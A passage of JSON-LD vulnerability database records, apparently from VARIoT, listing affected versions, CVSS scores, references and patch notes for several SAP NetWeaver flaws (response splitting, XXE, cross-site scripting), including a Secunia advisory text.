"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"date": "2018-12-10T19:29:14.877000",
"db": "NVD",
"id": "CVE-2016-1910"
},
{
"date": "2016-01-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of User Management Engine Vulnerable to unspecified data",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001297"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
],
"trust": 0.6
}
}
var-202002-1417
Vulnerability from variot
Under some circumstances the SAML SSO implementation in the SAP NetWeaver (SAP_BASIS versions 702, 730, 731, 740 and SAP ABAP Platform (SAP_BASIS versions 750, 751, 752, 753, 754), allows an attacker to include invalidated data in the HTTP response header sent to a Web user, leading to HTTP Response Splitting vulnerability. SAP NetWeaver and ABAP Platform There is an unspecified vulnerability in.Information may be tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-1417",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.31"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.40"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.51"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.54"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.52"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "sap_basis version 750"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "sap_basis version 751"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "sap_basis version 752"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "sap_basis version 753"
},
{
"model": "abap platform",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "sap_basis version 754"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "sap_basis version 702"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "sap_basis version 730"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "sap_basis version 731"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "sap_basis version 740"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002230"
},
{
"db": "NVD",
"id": "CVE-2020-6181"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:abap_platform:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:abap_platform:7.51:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:abap_platform:7.52:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:abap_platform:7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:abap_platform:7.54:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6181"
}
]
},
"cve": "CVE-2020-6181",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-002230",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.8,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-002230",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-6181",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2020-6181",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2020-002230",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202002-710",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002230"
},
{
"db": "NVD",
"id": "CVE-2020-6181"
},
{
"db": "NVD",
"id": "CVE-2020-6181"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-710"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Under some circumstances the SAML SSO implementation in the SAP NetWeaver (SAP_BASIS versions 702, 730, 731, 740 and SAP ABAP Platform (SAP_BASIS versions 750, 751, 752, 753, 754), allows an attacker to include invalidated data in the HTTP response header sent to a Web user, leading to HTTP Response Splitting vulnerability. SAP NetWeaver and ABAP Platform There is an unspecified vulnerability in.Information may be tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6181"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-002230"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-6181",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-002230",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202002-710",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002230"
},
{
"db": "NVD",
"id": "CVE-2020-6181"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-710"
}
]
},
"id": "VAR-202002-1417",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:52:02.526000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=537788812"
},
{
"title": "SAP NetWeaver and ABAP Platform Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=112468"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002230"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-710"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002230"
},
{
"db": "NVD",
"id": "CVE-2020-6181"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2880744"
},
{
"trust": 1.6,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=537788812"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6181"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-6181"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002230"
},
{
"db": "NVD",
"id": "CVE-2020-6181"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-710"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002230"
},
{
"db": "NVD",
"id": "CVE-2020-6181"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-710"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-002230"
},
{
"date": "2020-02-12T20:15:13.777000",
"db": "NVD",
"id": "CVE-2020-6181"
},
{
"date": "2020-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-710"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-002230"
},
{
"date": "2020-02-21T13:55:45.087000",
"db": "NVD",
"id": "CVE-2020-6181"
},
{
"date": "2020-03-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-710"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-710"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver and ABAP Platform Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002230"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-710"
}
],
"trust": 0.6
}
}
var-201706-1164
Vulnerability from variot
SAP Business Planning and Consolidation is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201706-1164",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "business planning and consolidation",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "99031"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "99031"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Business Planning and Consolidation is prone to an XML External Entity injection vulnerability.\nAttackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.",
"sources": [
{
"db": "BID",
"id": "99031"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "99031",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "99031"
}
]
},
"id": "VAR-201706-1164",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:50:56.991000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2457269"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/06/13/sap-security-patch-day-june2017/"
}
],
"sources": [
{
"db": "BID",
"id": "99031"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "99031"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99031"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99031"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "99031"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Business Planning and Consolidation XML External Entity Injection Vulnerability",
"sources": [
{
"db": "BID",
"id": "99031"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "99031"
}
],
"trust": 0.3
}
}
var-201210-0562
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Part of the unspecified input passed to the RFC WSDL service lacks filtering before returning to the user, allowing the attacker to perform cross-site scripting attacks, which can be exploited by an attacker to obtain sensitive information or hijack a user session. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: SAP NetWeaver RFC WSDL Service Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID: SA50884
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/50884/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=50884
RELEASE DATE: 2012-10-05
DISCUSS ADVISORY: http://secunia.com/advisories/50884/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/50884/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50884
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: ERPScan has reported a vulnerability in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerability is reported in version 7.02. Other versions may also be affected.
SOLUTION: Apply SAP Note 1614834.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY: Alexey Tyurin, ERPScan.
ORIGINAL ADVISORY:
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201210-0562",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5640"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Secunia",
"sources": [
{
"db": "PACKETSTORM",
"id": "117148"
}
],
"trust": 0.1
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "63971686-1f52-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
